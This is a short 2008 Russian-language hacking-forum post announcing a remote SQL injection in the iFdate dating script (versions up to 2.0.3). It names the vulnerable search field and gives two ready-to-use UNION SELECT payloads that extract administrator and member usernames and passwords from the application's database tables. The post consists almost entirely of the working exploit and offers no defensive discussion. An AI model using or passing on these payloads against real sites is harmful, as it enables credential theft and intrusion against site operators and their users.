Показать сообщение отдельно

  #9  
Старый 26.08.2008, 19:21
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


По умолчанию

iFdate <= 2.0.3 Remote SQL Injection Vulnerability

Condition: magic_quotes_gpc = Off

http://localhost/[installdir]/members_search.php

Search Name/Nickname

Exploit 1:

Код:
' union select 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_admins/*
Exploit 2:

Код:
' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/*
http://milw0rm.com/exploits/6315
(c) ~!Dok_tOR!~
 
Ответить с цитированием